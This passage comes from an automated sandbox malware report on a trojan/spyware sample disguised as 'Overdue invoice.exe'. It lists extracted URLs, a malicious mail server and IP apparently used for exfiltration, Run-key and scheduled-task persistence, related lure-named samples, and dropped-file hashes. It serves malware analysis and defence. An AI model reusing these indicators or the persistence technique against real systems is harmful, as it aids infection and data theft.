                            http://www.tiro.comOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253859484.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253816400.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253303468.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253356717.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253456642.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.comepkoOverdue invoice.exe, 00000000.00000003.297172527.0000000005900000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303053432.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.comessedOverdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.goodfont.co.krOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://mail.jkudyog.comOverdue invoice.exe, 00000007.00000002.522968890.0000000003760000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.523253401.000000000339C000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.founder.com.cn/cnoOOverdue invoice.exe, 00000000.00000003.254629796.0000000005904000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254953312.000000000590B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.sajatypeworks.comOverdue invoice.exe, 00000000.00000003.252984688.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252856713.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252888263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253011774.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252782511.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253067018.0000000005924000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253045863.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252808922.0000000005920000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253078124.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253115594.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.252958098.000000000591E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.founder.com.cn/cn/cTheOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://fontfabrik.comOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://I323GyXsTwT8KsWsK7L.net1-5-21-3853321935-21255632Overdue invoice.exe, 00000007.00000003.315746874.00000000011D4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://DynDns.comDynDNSnamejidpasswordPsi/PsiyqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fonts.comnOverdue invoice.exe, 00000000.00000003.253007661.000000000591B000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253040437.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/DPleaseOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.urwpp.depAOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.founder.com.cn/cn/lOverdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.comttoFOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fonts.comOverdue invoice.exe, 00000000.00000003.253045863.000000000591E000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.253078124.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.sandoll.co.krOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleaseOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOverdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 0000000F.00000002.373514445.0000000002CFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.sakkal.comOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com=Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.sandoll.co.kr=Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.fontbureau.comlicFOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.apache.org/licenses/LICENSE-2.0Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.comOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://I323GyXsTwT8KsWsK7L.net8Overdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.agfamonotype.Overdue invoice.exe, 00000000.00000003.265415364.000000000590A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwOverdue invoice.exe, 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.founder.com.cn/cnt-iaOverdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.comoGCOverdue invoice.exe, 00000000.00000003.297172527.0000000005900000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303053432.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.comdcOverdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://dWZLeu.comyqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.sandoll.co.kr$AOverdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.founder.com.cn/cnzOverdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.comdOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.carterandcone.comlOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cnOverdue invoice.exe, 00000000.00000003.254629796.0000000005904000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.254870128.0000000005904000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlOverdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krF1Overdue invoice.exe, 00000000.00000003.254081305.0000000005906000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlPOverdue invoice.exe, 00000000.00000003.260820341.0000000005935000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designers/cabarga.htmlOverdue invoice.exe, 00000000.00000003.260820341.0000000005935000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260841728.0000000005935000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.comB.TTFlCOverdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://I323GyXsTwT8KsWsK7L.netyqWDN.exe, 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000013.00000002.523253401.000000000339C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.commOverdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cne-dOverdue invoice.exe, 00000000.00000003.254612717.000000000593D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comoOverdue invoice.exe, 00000000.00000003.260779440.000000000590A000.00000004.00000800.00020000.00000000.sdmp, Overdue invoice.exe, 00000000.00000003.260513239.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8Overdue invoice.exe, 00000000.00000002.303440759.0000000006B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.comdCOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.fontbureau.comalsOverdue invoice.exe, 00000000.00000003.261333763.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.tiro.comhOverdue invoice.exe, 00000000.00000003.253303468.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.tiro.comcOverdue invoice.exe, 00000000.00000003.253356717.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  206.183.111.188
                                                  		mail.jkudyog.comUnited States
                                                  		133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINtrue

                                                  Private

                                                  IP
                                                  192.168.2.1

                                                  General Information

                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                  Analysis ID:635084
                                                  Start date and time: 27/05/202212:52:122022-05-27 12:52:12 +02:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 12m 52s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:Overdue invoice.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:32
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.adwa.spyw.evad.winEXE@15/8@3/2
                                                  EGA Information:
                                                  • Successful, ratio: 80%
                                                  HDC Information:
                                                  • Successful, ratio: 0.3% (good quality ratio 0.2%)
                                                  • Quality average: 36.5%
                                                  • Quality standard deviation: 31.4%
                                                  HCA Information:
                                                  • Successful, ratio: 96%
                                                  • Number of executed functions: 210
                                                  • Number of non-executed functions: 30
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Adjust boot time
                                                  • Enable AMSI

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 20.54.89.106, 52.152.110.14, 52.242.101.226, 20.223.24.244
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                  • Execution Graph export aborted for target Overdue invoice.exe, PID 7124 because there are no executed function
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  12:53:25API Interceptor703x Sleep call for process: Overdue invoice.exe modified
                                                  12:53:45AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run yqWDN C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                  12:53:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run yqWDN C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                  12:53:58API Interceptor456x Sleep call for process: yqWDN.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  206.183.111.188statement of account.exeGet hashmaliciousBrowse
                                                    Request Quotation.exeGet hashmaliciousBrowse
                                                      statement of account.exeGet hashmaliciousBrowse
                                                        BANK slip.exeGet hashmaliciousBrowse
                                                          invoice.exeGet hashmaliciousBrowse
                                                            NEW QUOTATION ENQUIRY.exeGet hashmaliciousBrowse
                                                              Statement of Account.exeGet hashmaliciousBrowse
                                                                new order 20211029.exeGet hashmaliciousBrowse
                                                                  SOA.exeGet hashmaliciousBrowse
                                                                    purchase order pdf.exeGet hashmaliciousBrowse
                                                                      payment infirmation.exeGet hashmaliciousBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        mail.jkudyog.comstatement of account.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        Request Quotation.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        statement of account.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        BANK slip.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        soa.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        invoice.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        NEW QUOTATION ENQUIRY.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        Statement of Account.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        new order 20211029.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        SOA.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        SOA.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        purchase order pdf.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        payment infirmation.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        WEBWERKS-AS-INWebWerksIndiaPvtLtdINhttps://oscarwilliams.net/re/1665.phpGet hashmaliciousBrowse
                                                                        • 103.251.94.111
                                                                        Kn7vI9IYMc3QOV4.exeGet hashmaliciousBrowse
                                                                        • 43.241.37.192
                                                                        https://www.3pumphouse.com/?gclid=EAIaIQobChMIlab2mvPr9wIVD-G7CB3y0goCEAEYASAAEgJ2fvD_BwEGet hashmaliciousBrowse
                                                                        • 103.86.176.137
                                                                        PO087-Uhhgyauag98-Ybsysgbuygayuu.htmGet hashmaliciousBrowse
                                                                        • 180.149.241.244
                                                                        GlKt2OVVbMGet hashmaliciousBrowse
                                                                        • 103.118.12.141
                                                                        xd.arm7Get hashmaliciousBrowse
                                                                        • 103.118.12.103
                                                                        statement of account.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        wfXXHrVoiOGet hashmaliciousBrowse
                                                                        • 43.241.39.126
                                                                        Request Quotation.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        6DUDXXCuW8.exeGet hashmaliciousBrowse
                                                                        • 103.212.121.91
                                                                        statement of account.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        61qmScKTMK.exeGet hashmaliciousBrowse
                                                                        • 103.212.121.91
                                                                        nL63S1iE3iGet hashmaliciousBrowse
                                                                        • 103.118.12.144
                                                                        lAaP4XA5wBGet hashmaliciousBrowse
                                                                        • 43.241.39.151
                                                                        FIR COPY.SCR.exeGet hashmaliciousBrowse
                                                                        • 103.224.240.69
                                                                        7QU8r8CWACGet hashmaliciousBrowse
                                                                        • 103.118.12.135
                                                                        FIR.exeGet hashmaliciousBrowse
                                                                        • 103.224.240.69
                                                                        9KYaTfGxCCGet hashmaliciousBrowse
                                                                        • 43.241.39.185
                                                                        BANK slip.exeGet hashmaliciousBrowse
                                                                        • 206.183.111.188
                                                                        adjunto 07032022.xlsmGet hashmaliciousBrowse
                                                                        • 103.251.24.104

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Overdue invoice.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Overdue invoice.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.355304211458859
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                                        MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                                        SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                                        SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                                        SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                                        Malicious:true
                                                                        Reputation:high, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yqWDN.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.355304211458859
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                                        MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                                        SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                                        SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                                        SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                        C:\Users\user\AppData\Local\Temp\tmp2055.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1645
                                                                        Entropy (8bit):5.196427141159646
                                                                        Encrypted:false
                                                                        SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBNixYtn:cbh47TlNQ//rydbz9I3YODOLNdq3SQ
                                                                        MD5:364FC5EE0A5C3367CC852041FF7A5AF8
                                                                        SHA1:2F039FE567DB11CEC74B020B1DC57E7BD20B8CC2
                                                                        SHA-256:8037DD1DC6177AFE6038B4A78C79274F4DFFF4A96098ACE279B12517F607EEB8
                                                                        SHA-512:AA980A773C0DC2E154EB1D060F3D90F05814E74BCE492C50DC2904D73724BC18ADF7677C127CEF0B98230856AEF47B42E39CE43293B7F7E28A77CEE9DD7980E4
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

                                                                        C:\Users\user\AppData\Local\Temp\tmpA306.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Overdue invoice.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1645
                                                                        Entropy (8bit):5.196427141159646
                                                                        Encrypted:false
                                                                        SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBNixYtn:cbh47TlNQ//rydbz9I3YODOLNdq3SQ
                                                                        MD5:364FC5EE0A5C3367CC852041FF7A5AF8
                                                                        SHA1:2F039FE567DB11CEC74B020B1DC57E7BD20B8CC2
